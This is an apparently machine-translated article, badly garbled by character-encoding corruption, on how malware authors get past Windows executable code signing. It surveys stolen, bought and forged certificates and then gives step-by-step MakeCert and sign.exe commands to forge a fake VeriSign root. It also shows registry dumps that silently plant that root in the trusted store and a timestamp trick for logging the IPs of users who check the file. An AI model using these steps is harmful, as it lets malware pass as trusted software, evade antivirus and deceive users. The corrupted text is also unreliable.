
ããã©ããã«ã¡ã¯ïŒ
ãŸãã圌ãã¯ã«ã«ãã®åé¡ãäœãšã解決ã§ããããã«èŠããŸãããçŸåšã®ãããã¯ã«ã€ããŠã¯äžå觊ããŠãããããã®å€èŠ³ã®ç¹å®ã®é 延ã®ã¿ã説æããŠããŸãïŒæåã®èšç»ã¯æšå¹Ž11æã§ããïŒã
ä»æ¥ã¯ãå®è¡å¯èœãã¡ã€ã«ã®é»å眲åã®ã·ã¹ãã ãšããã®ã·ã¹ãã ãè¿åããŠæ¹ããããæ¹æ³ã«ã€ããŠã®å°ããªã¬ãã¥ãŒãã玹ä»ããŸãã éåžžã«å¹æçãªåé¿çã®1ã€ã«ã€ããŠã詳现ã«æ€èšããŸãã èšèŒãããŠããã€ã³ãã§ã¯ãã§ã«æ°ãæåã§ãããšããäºå®ã«ããããããã誰ããããã«ã€ããŠç¥ã£ãŠããããã§ã¯ãããŸããã 以äžã«èª¬æãã補åã®è£œé å ã«ã¯ã説æãããŠããè³æãéç¥ãããŠããããããã®åé¡ã®è§£æ±ºçã¯ããããèæ ®ããå Žåããã®è²¬ä»»ã§ãã ããããã®æéããã£ãããã§ãã
çè«
å®è¡å¯èœãã¡ã€ã«ã®é»å眲åã®ã¢ã€ãã¢ãšæè¡ã¯ãWindows NTã®æ代ã«å§ãŸããŸããã Windows Vistaã®ç»å Žä»¥æ¥ããã€ã¯ããœããã¯ãã®ãã¯ãããžãä¿é²ããããã«ç©æ¥µçãªäŒç€Ÿãç«ã¡äžããŸããã ã¡ãŒã«ãŒã®èãã«ãããšã眲åãããã³ãŒãã¯ãã®ã³ãŒãã®ä¿¡é Œã§ããäœæè ããã®ã¿æäŸããããããã·ã¹ãã ã«å®³ãäžããªãããšãä¿èšŒããããšã©ãŒããä¿è·ãããŸãïŒ 3ãã ïŒã
ãã ãã眲åã¡ã«ããºã ã¯ããªãè€éãªæå·åã¡ã«ããºã ã䜿çšããããšãæãå€ãããã眲åãããã³ãŒãã«å¯Ÿããäžè¬çãªä¿¡é Œãåºãã£ãŠããŸãã ãŠã€ã«ã¹å¯Ÿçãã³ããŒã¯ããããéããŸããã§ããã çå®ã§ããã³ãŒãã眲åãããŠããå Žåãæããã«ãŠã€ã«ã¹ã§ã¯ãªããããã¢ããªãªãªã«ä¿¡é Œã§ããããã誀æ€ç¥ã®å¯èœæ§ãäœããªããŸãã ãã®ãããã»ãšãã©ã®ææ°ã®ãŠã€ã«ã¹å¯Ÿç補åã§ã¯ãããã©ã«ãã§çœ²åæžã¿ãã¡ã€ã«ã®ãã§ãã¯ããã€ãã¹ãããã¹ãã£ã³é床ãåäžãã誀æ€ç¥ã®å¯èœæ§ãäœããªããŸãã ããã«ãå€ãã®å Žåã眲åãããããã°ã©ã ã¯ããããã®ãä¿¡é Œã§ãããè¡ååæã®ã«ããŽãªã«èªåçã«å ¥åãããŸãã
æå¹ãªçœ²åã䜿çšããŠäœæç©ã«çœ²åããããšã«ããããŠã€ã«ã¹äœæè ã¯ãã¢ã¯ãã£ãã§å®æçã«æŽæ°ããããŠã€ã«ã¹å¯Ÿçã«ææããããšã«ãªã顧客ãããªãå€ãç²åŸããããšãæããã«ãªããŸãã æããã«ãããã¯éåžžã«ããããäžå£ã§ããããã¯ãã³ãŒããæå¹ãªRealtek蚌ææžã§çœ²åãããæ¢ã«æåãªStuxnetãŠã€ã«ã¹ã®äŸã§ç°¡åã«ç®ç«ã¡ãŸãïŒJMicronããã®ããé ã眲åãå ±åãããŸããïŒã
ãããããã®ã¢ãããŒãã«ã¯è£è¿ãããããŸãã䟵害ããã眲åãç¹å®ãããšããã«å¿çãã眲åã®äºå®ã«ãã£ãŠãAVãã³ããŒã¯çœ²åæ€åºãè¡ãã100ïŒ ã®å¿çã§ããããšãæããã§ãã 眲åã«å¿ èŠãªçãŸãã蚌ææžãååŸããã®ã¯éåžžã«è²»çšããããããšãèãããšããŠã€ã«ã¹äœæè ãæå¹ãªç§å¯éµãªãã§ããŸãã¯ãã®ãããªéµãåå¥ã«çæããããšã«ããã眲åæ€èšŒã¡ã«ããºã ã®å®å šãªãã€ãã¹ã«é¢å¿ãããããšã¯æããã§ãã ããã«ããããŠã€ã«ã¹å¯Ÿç補åã®ä¿è·ããã€ãã¹ããã ãã§ãªããèŠåãªãã«ãã©ã€ããŒãšActiveXã³ã³ããŒãã³ããã€ã³ã¹ããŒã«ããããšãã§ããéåžžã¯çœ²åãªãã§äœãã€ã³ã¹ããŒã«ã§ããªãx64ã®äžçã«äŸµå ¥ããããšãã§ããŸãã
ããããå®éã«ã¯ããã«ã€ããŠã®è©³çŽ°ã
ç·Žç¿
å倧ãªè ã®èª°ãã¯ãæµã«å ãããã«ã¯ã圌ã®ããã«èãå§ããªããã°ãªããªããšèšããŸããã ããã§ãããç§ãã¡ããŠã£ã«ã¹ã¡ãŒã«ãŒã§ãããªãã°ãç§ãã¡ã¯äœãã§ããã§ããããïŒ
1.ã¯ãªãŒã³ãªãã¡ã€ã«ãã蚌ææžæ å ±ãã³ããŒããŸãã
ããã¯çŸæç¹ã§æãäžè¬çãªæ¹æ³ã§ãã 眲åæ å ±ã¯ãä¿¡é Œã§ããçºè¡å ã®ãã§ãŒã³ã«è³ããŸã§ã现éšãŸã§ã³ããŒãããŸãã ãã®ãããªã³ããŒã¯ããŠãŒã¶ãŒã®ç®ã«ã®ã¿æå¹ã§ããããšã¯æããã§ãã ãã ããOSã衚瀺ããå 容ã¯ãçµéšã®æµ ã人ãæ··ä¹±ãããå¥ã®äžå ·åãšããŠèªèãããå¯èœæ§ããããŸãããã¹ãŠã®çºè¡å ãæ£ããå Žåããã®çœ²åãç¡å¹ãªã®ã¯ãªãã§ããã ããããã-ãã®ãããªéåæ°ã
2.åœåã§èªå·±çœ²å蚌ææžã䜿çšããŸãã
äžèšã®ãªãã·ã§ã³ã«äŒŒãŠããŸããã蚌ææžãã¹ã®ãã§ãŒã³ãã³ããŒãããªãç¹ãç°ãªããŸãã
3.åœã®MD5ã
MD5ã¢ã«ãŽãªãºã ã®åŒ±ç¹ã¯é·ãé説æãããŠãããšããäºå®ïŒ ãããšãã ïŒã«ãé¢ããããé»å眲åã§ã¯äŸç¶ãšããŠé »ç¹ã«äœ¿çšãããŠããŸãã ãã ããMD5ãããã³ã°ã®å®éã®äŸã¯ãéåžžã«å°ãããã¡ã€ã«ã«é¢ä¿ããããã³ãŒãã®èª€åäœã«ã€ãªãããŸãã å®éã«ã¯ãMD5ã¢ã«ãŽãªãºã ã§åœã®ã¯ã©ãã¯ãããã·ã°ããã£ãæã€ãŠã€ã«ã¹ã¯èŠã€ãããŸããããããã«ããããããããã®æ¹æ³ã¯çè«çã«ã¯å¯èœã§ãã
4.éåžžã®æé ã«åŸã£ãŠèšŒææžãååŸããæªæã®ããç®çã«äœ¿çšããŸãã
ãããããªã¹ã¯ãŠã§ã¢ãã¢ããŠã§ã¢ãåœã®ã¢ã³ããŠã€ã«ã¹ã®äœè ã®æãäžè¬çãªæ¹æ³ã®1ã€ã äŸãšããŠãåœã®Perfect DefenderïŒæšæºçãªè©æ¬ºïŒãç¡æã§ã¹ãã£ã³-ãŠã€ã«ã¹ã«ææããŠãã-åŒç€Ÿã«æ¯æããåé€ããŸããïŒãããã€ãã®ãªãã£ã¹ã®çœ²åãšå ±ã«ååšããŸãã
â¢ãžã£ã³ãœãllc
â¢Perfect Software llc
â¢Sovinsky llc
â¢Trambambon llc
ãããã©ã®ããã«è¡ããããã¯ãåœå ã®winlockeréçºè ã«ãã£ãŠèª¬æã§ããŸããéçºè ã¯ãããžã§ãŒã¯ããã°ã©ã ããªã©ã«ã€ããŠå°ããªæçŽãæžããŠãããè©æ¬ºã«é¢ããèšäºããä¿è·ãããŠããŸãã ãããŠãç§ãã¡ã¯çããŠããŸã...
èå³æ·±ãããšã«ã次ã®ææè åãæã€çµ¶å¯Ÿã«éåžžã®ããã°ã©ã ããããŸãã
â¢æ€èšŒæžã¿ãœãããŠã§ã¢
â¢æ£èŠã®ãœãããŠã§ã¢ã¢ããããŒãéå®
â¢ãã©ãŠã¶ãã©ã°ã€ã³
ãããæ¬åœã«ä¿¡ããŠããã®ã§ããã°ã蚌ææžãäžèŠããŠééããããšã¯é£ãããªãããšã¯æããã§ãã
ãŸããèªèšŒã»ã³ã¿ãŒãã眲åãååŸããããšã¯æ±ºããŠå°é£ã§ã¯ãªãããšã«æ³šæããŠãã ããã ããšãã°ãRapidSSLã¯æ€èšŒã«é»åã¡ãŒã«ã®ã¿ã䜿çšããŸãã éä¿¡ãadminãadministratorãhostmasterãinfoãisãitãmisãpostmasterãrootãssladminãªã©ã®ã¢ãã¬ã¹ããã®ãã®ã§ããå Žåã
ssladministratorãsslwebmasterãsysadminããŸãã¯webmaster@somedomain.com-æããã«ãã¡ã€ã³ææè ãæžããŠããŸãããïŒ ïŒ ããã«3ã€ã®æ¯ ïŒã ããããã¢ãŠããœãŒã·ã³ã°ãšeã³ããŒã¹ãæäŸããæ å ã®äŒç€ŸDigital RiverïŒDRïŒã¯ãéåžžããã¹ãŠã®é¡§å®¢ã«èšŒææžãæäŸããŸãã MSNSpyMonitorãWinFixerãQuickKeyLoggerãErrorSafeãESurveillerãSpyBuddyãTotalSpyãSpynomoreãSpypalãããã³äžè¬çã«ãã¹ãŠã®çœ²åæžã¿DRãã¡ã€ã«ã®çŽ0.6ïŒ ããžã£ã³ã¯ã§ããããã¹ãŠã®çœ²åæžã¿DRãã¡ã€ã«ã®5ïŒ ä»¥äžãæœåšçã«äžèŠã§ããããšãäžæè°ã§ã¯ãããŸããã
å ¬å¹³ã«èšããšãx64ãã©ã€ããŒãžã®çœ²åã¯æ±ºããŠç°¡åã§ã¯ãªãããšã«æ³šæããŠãã ããããã®å ŽåããããŸã§ã®ãšããéåã¯ç¢ºèªãããŠããŸããã
5.ä¿¡é Œã§ããäŒç€Ÿã®åŸæ¥å¡ãèŠã€ããŠãã³ãŒãã«çœ²åããããäŸé ŒããŸãã
ã³ã¡ã³ãã¯ãããŸããã 誰ãããéãæããŠããŸãã å¯äžã®è³ªåã¯åèšã§ã:)
6.蚌ææžãçã¿ãŸãã
çŸåšãç¹ã«èšŒææžã®çé£ã®ããã«ãæçããããŠããããã€ã®æšéŠ¬ã®3ã€ã®å€§ããªãã¡ããªãŒããããŸãã ããã¯ïŒ
â¢ã¢ãã¬ããªã³
â¢ãŠã«ã¹ãã
â¢ãŒãŠã¹
â¢SpyEyeïŒå¯èœãªå ŽåïŒ
ããã«ããããããããããã®ããã€ã®æšéŠ¬ã®æ°ããããŒãžã§ã³ã§çãŸãã蚌ææžã䜿çšãã倧èŠæš¡ãªã±ãŒã¹ã¯ä»ã®ãšããæ°ã¥ãããŠããŸããã ããããããã¯è¢ã®åãæã§ããïŒ æéãæããŠãããŸã...
7.ä¿¡é Œã§ããéçºè éçºã·ã¹ãã ã«ææãã眲ååã«ãªãªãŒã¹ã«æªæã®ããã³ãŒããæ¿å ¥ããŸãã
ãã®ãããªææã®å žåçãªäŸã¯ãInduc.aãŠã€ã«ã¹ã®æŠå¿µã§ãã ãŠã€ã«ã¹ã¯ãã³ã³ãã€ã«æ®µéã§ã³ãŒããæ¿å ¥ããéçºã·ã¹ãã ã«ææããŸãã ãã®çµæãéçºè ã¯ãç®ã«èŠããªããä»å±ç©ããèªåã®ããã°ã©ã ã«ç»å Žããããšããç¥ããŸããã ãªãªãŒã¹ã¯çœ²åã«åæ Œããå®å šãªèšŒææžãçºè¡ãããŸãã ããªããèŠãïŒ ãããã圌ã¯ããã§ãïŒ ;ïŒ
幞ããªããšã«ãInduc.aã¯PoCã®ã¿ã§ãããè¿œå ã®æªæã®ããæ©èœãå®è£ ããã«éçºã·ã¹ãã ã®ææã®ã¿ãå®è¡ããŸãã
ããŠãä»-çŽæã®ãèåã
è匱æ§ãŸãã¯ãã®å€ã®éããæ¹
ã芧ã®ãšããã眲åãåé¿ããããã®å€ãã®ãªãã·ã§ã³ããããŸãã ãã®äŸã§ã¯ãäžèšã®ä¿®æ£ããŒãžã§ã³1ããã³2ãæ€èšããŸãã
ããã§ãäœãå¿ èŠã§ããïŒ
-MakeCert.exe
-cert2spc.exe
-sign.exe
-ruki.sys
-mozg.dll
ããã©ã¯ã¿ãŒããããã®ã³ã³ããŒãã³ããèŠã€ããããšã¯é£ãããªããšæããŸãããæãæ zyãªäººã®ããã«ãæåã®3ã€ãããã«æçš¿ããŠããŸã ã ããŒããŠã§ã¢ãžã®ç·å¯ãªçµåãã¯ãã¹ãã©ãããã©ãŒã ãšã³ãŒãã®ç¹ç°æ§ã®å®å šãªæ¬ åŠãèæ ®ããŠãç§ã¯æåŸã®2ã€ãæçš¿ããŸãã:)
ãã®ãããããçš®ã®ä¿¡é Œã§ããçºè¡å 蚌ææžãäœæããŸãã åãVeriSignã«é¢ããæ å ±ãå¯èœãªéãã³ããŒããŠã¿ãŸãããã
MakeCert.exe -# 7300940696719857889 -$ commercial -n CN="VeriSign Class 3 Code Signing 2009-2 CA" -a sha1 -sky signature -l "https://www.verisign.com/rpa" -cy authority -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.2,1.3.6.1.5.5.7.3.3 -r -sv veri.pvk veri.cer
å®è¡ã®çµæã眲åã«é©ããveri.pvkãšveri.cerãååŸããŸãã
次ã«ãåä¿¡ããã°ããã䜿çšããŠå蚌ææžãäœæããŸãã
MakeCert.exe -# 8928659211875058207 -$ commercial -n CN="Home Sweet Home" -a sha1 -sky signature -l "http://habrahabr.ru/" -ic veri.cer -iv veri.pvk -cy end -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.3 -sv kl.pvk kl.cer
ãã®çµæãkl.pvkãškl.cerãååŸããŸãããããã¯ãä¿¡é Œã§ããªãçºè¡å ããã®ä¿¡é Œã§ãã蚌ææžã§ãã åçŽãªãŠãŒã¶ãŒãã ãŸããŠããã§ãŒã³ãé·æéç¶ç¶ããããšãã§ããŸãã ããããçµæã¯1ã€ã«ãªããŸãããã§ãŒã³å ã«ä¿¡é ŒãããŠããªãèŠçŽ ã1ã€ããããã蚌ææžã¯ç¡å¹ã«ãªããŸãã ãããïŒ
Windowsã§ã¯ãèªå·±çœ²å蚌ææžãå«ãä»»æã®èšŒææžãä¿¡é Œã§ãããã®ãšããŠã€ã³ã¹ããŒã«ã§ããŸãã ããã¯äŸ¿å©ã§ããå Žåã«ãã£ãŠã¯ãéçºè ã¯èªåã§èªå·±çœ²å蚌ææžãäœæãããããä¿¡é Œã§ãã蚌ææžã«å ¥åããŠãã¢ããªã±ãŒã·ã§ã³ã§å·éã«äœæ¥ããããšãã§ããŸãã ç§ãã¡ã®å Žåããã®ãããªãšã³ããªã¯æããã«ã¬ãžã¹ããªãžã®æ å ±ã®åçŽãªãšã³ããªã§ãããããããã¯äºéã«äŸ¿å©ã§ãã æ å ±ã¯ç¹å®ã®ã·ã¹ãã ã«åºæã®ãã®ã§ã¯ãããŸããã
ãã¹ãä»®æ³ãã·ã³ã«ã¬ãžã¹ããªã¢ãã¿ãŒãã€ã³ã¹ããŒã«ããåŸãå¿ èŠãªèšŒææžãVeriSignããä¿¡é Œã§ãããã®ã«è¿œå ããŸãã å€æŽãçºçããå Žæã远跡ããŸããã-ãããŠåºæ¥äžããã§ãïŒ å¯Ÿå¿ããã¬ãžã¹ããªãã©ã³ãããã³ãããŠãã€ã³ã¹ããŒã©ãŒã«é 眮ã§ããŸãã åèšã§ãã€ã³ã¹ããŒã©ãŒã¯ã¬ãžã¹ããªæ å ±ãå ¥åãããã©ã€ããªçºè¡è ã®èšŒææžãèªåçã«ä¿¡é Œã§ãããã®ã«å€æãããã§ãŒã³å šäœãæ€èšŒããŸãã
ãã¹ãŠã®ã«ãŒããå®å šã«éããªãããã«ããããã«ãç§ã®å Žåãã¬ãžã¹ããªãã³ãã¯æ¬¡ã®ããã«èŠãããšããèšããŸããã
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
"Blob"=hex:04,00,00,.....
ãŸãããŸãã¯çŸåšã®ãŠãŒã¶ãŒã®ã¿ã®å Žåã
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\A61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
"Blob"=hex:04,00,00,.....
ãã®ããŒã¿ãã¬ãžã¹ããªã«å ¥åãããšãåœã®çœ²åãã§ãŒã³ãæã€ããã°ã©ã ãsigverif.exeã«ãã£ãŠèªåçã«ãã§ãã¯ãããŸããã ããŠãåãåã£ã蚌ææžã®å©ããåããŠã³ãŒãã«çœ²åããã®ã¯äžè¬çã«ç°¡åã§ãããããã¡ã€ã«ã ãã§ãïŒ
cert2spc.exe kl.cer kl.spc
sign.exe -spc kl.spc -v kl.pvk -n "My Installer" -i "http://habrahabr.ru" -ky signature -$ commercial -a sha1 -t "http://timestamp.verisign.com/scripts/timstamp.dll" myprogram.exe
del kl.spc
ã¿ã€ã ã¹ã¿ã³ãtimestamp.verisign.com/scripts/timstamp.dllã®äœ¿çšã«æ³šæããŠãã ãã-çè«çã«ã¯ãç¬èªã®ãã¡ã€ã³ã§ç¬èªã®ãµãŒããŒã䜿çšããããšã¯å¯èœã§ããããã«ããã誰ããã³ã³ãã¥ãŒã¿ãŒäžã®ããã°ã©ã ã®çœ²åããã§ãã¯ãããã³ã«ãIPãååŸããããšãã§ããŸããæéã確èªããŠãã ããã 䟿å©ã§ããïŒ ;ïŒ
é¢çœãããšã«ã2010幎10æãã11æã«è³æãæžããæç¹ã§ã¯ãKaspersky Internet Security 2011ã¯ç¹å®ã®ã¬ãžã¹ããªãã©ã³ãã远跡ããŠããŸããã§ããããã§ãŒã³ã®æ€èšŒã¯OSã®è£éã«ä»»ãããŠããŸããã ä»ã¯ããããŸããããäžéšã®ãã©ã³ãããããã¯ãããŠããããã§ã...ãã§ãã¯ããŠãç»é²è§£é€ããŠãã ããïŒ
眲åã«çœ²åããããã«ããããªãã¯ãã¡ã€ã³ã§å©çšã§ããªãç¹å®ã®ãœãããŠã§ã¢ã䜿çšããããšãå¯èœã§ããããšã«æ³šæããå¿ èŠããããŸãã 圌ã眲åãç Žããªãããšã¯æããã§ãããX500ãã£ãŒã«ãã«å ¥åããããã®ã¯ããã«æè»ãªå¯èœæ§ãæäŸããŸãã ããã§ã¯ã奜å¥å¿exampleçãªäŸãããŠã³ããŒãã§ããŸãã ã¢ãŒã«ã€ã-Microsoft眲åã®æç¡ã«ãããããã人æ°ã®ãã亀æçšã¡ã¢åž³bred3_2kïŒ offsite ïŒã®ãã¡ã€ã«:)眲åãå®å šã«æå¹ã«ãªãã«ã¯ãããŒ+ .regãã¡ã€ã«ã«å«ãŸããã¬ãžã¹ããªãå€æŽããã ãã§ååã§ãã åæ§ã«ãããŒ-.regãã¡ã€ã«ã¯ãããã®å€æŽãç Žæ£ããŸãã 蚌ææžã®ãã¹ã远跡ãã-奜å¥å¿ã匷ã:)
ãäŸãã®äœæè ãç¬èªã®ã¿ã€ã ã¹ã¿ã³ããµãŒããŒãç»é²ãããšããäºå®ã«ããã«æ³šæãåããŸããããã«ãããæäœã«ãã£ãŠäœæè ãIPãèªèã§ããããã«ãªããŸãã å¿ èŠã«å¿ããŠããããã®ç³ãç«ãŠã远跡ããã³ã¡ã³ãã®ç»é²ã解é€ã§ããŸã;ïŒ
å¿ èŠã«å¿ããŠã次ã®èšäºã§ã¯ãä¿¡é Œããã蚌ææžãžã®èšŒææžã®å°å ¥ãé¿ããããã«ã察å¿ããã¬ãžã¹ããªãã©ã³ããä¿è·ããããã«ããããæ§æããæ¹æ³ã説æããŸãã ã³ã¡ã³ãã®è³Œèªãäžæ¢-ãã®è匱æ§ã¯ãã§ã«ä¿®æ£ãããŠããå¯èœæ§ããããŸãã
ãã®èšäºã§ã¯ãææã®ãã¬ãŒã³ããŒã·ã§ã³Jarno NiemelaïŒF-SecureïŒã䜿çšããŸããã